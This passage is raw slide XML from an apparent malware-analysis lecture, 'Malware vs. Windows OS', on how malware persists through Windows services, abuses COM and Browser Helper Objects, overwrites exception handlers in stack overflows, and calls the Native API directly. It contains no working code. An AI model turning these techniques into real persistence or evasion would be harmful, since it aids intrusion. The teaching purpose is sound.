      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="684" name="Google Shape;1271;p135" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="794160" y="1556640"/>
            <a:ext cx="7555320" cy="3744000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="685" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5940720" y="1906920"/>
            <a:ext cx="1439640" cy="360"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="4a7dba"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="stealth" w="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7662600" y="1722960"/>
            <a:ext cx="1374120" cy="63972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Mutex name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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="57000"/>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Service</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Another way for malware to execute additional code is by installing it as a service</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Normally run as SYSTEM or another privileged account</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Provide another way to maintain persistence on a system, automatically run when the OS starts, and may not even show up in the Task Manager as a process.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Services can be installed and manipulated via a few Windows API functions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="482"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>OpenSCManager</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="482"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>CreateService</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="482"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>StartService</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="26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Stored in the registry: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>HKLM\SYSTEM\CurrentControlSet\Services</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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690"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Common Services</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>WIN32_SHARE_PROCESS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Svchost.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>WIN32_OWN_PROCESS </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>KERNEL_DRIVER </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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SC program, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>sc qc “Spooler”</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="691" name="Google Shape;1286;p137" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="0" t="0" r="16831" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="4060080"/>
            <a:ext cx="6812280" cy="2536560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="60000"/>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Component Object Model </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(COM)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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an interface standard that makes it possible for different software components to call each other’s code without knowledge of specifics about each other</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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COM works with any programming language, especially OOP languages.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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COM is implemented as a client/server framework.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="556"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Each thread that uses COM must call the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>OleInitialize</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>CoInitializeEx</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> function at least once prior to calling any other COM library functions.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Access via</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Class Identifiers (CLSIDs)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Interface Identifiers (IIDs)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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="695"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Common COM functions/interfaces</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>CoCreateInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: get access COM functionality</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Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Navigate</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: allows a program to launch IE and access a website. It is a part of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>IWebBrowser2</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="696" name="Google Shape;1300;p139" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591920" y="2997000"/>
            <a:ext cx="5994720" cy="2357640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307440" y="5373360"/>
            <a:ext cx="8563320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="accent3"/>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Some malware implements a malicious COM server, which is subsequently used by other applications. Common COM server functionality for malware is through </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Browser Helper Objects (BHOs)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, which are third-party plug-ins for Internet Explorer.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Real-world Impacts</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132"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2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>2018 – User information cyber attack</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Emotet : </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>is a modular Trojan that downloads or drops banking Trojans</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>2019 - supply chain attack </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Malware inserted into HAVC suppliers, IoT, smarthome</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Operation ShadowHammer</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-215640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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8"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Malware vs. Windows OS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="699"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Exceptions</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Exceptions allow a program to handle events outside the flow of normal execution caused by errors (e.g. division by zero)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="700" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1149840" y="5159160"/>
            <a:ext cx="7238160" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="accent3"/>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Exception handlers can be used in exploit code to gain execution. A pointer to exception-handling information is stored on the stack, and during a stack overflow, an attacker can overwrite the pointer.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="701" name="Google Shape;1309;p140" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1816920" y="3285000"/>
            <a:ext cx="5547240" cy="1392480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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Native API</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703"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The Native API is a lower-level interface for interacting with Windows</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Calling functions in the Native API bypasses the normal Windows API.</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E.g. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Ntdll.dll </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>directly</a:t>
            </a:r>
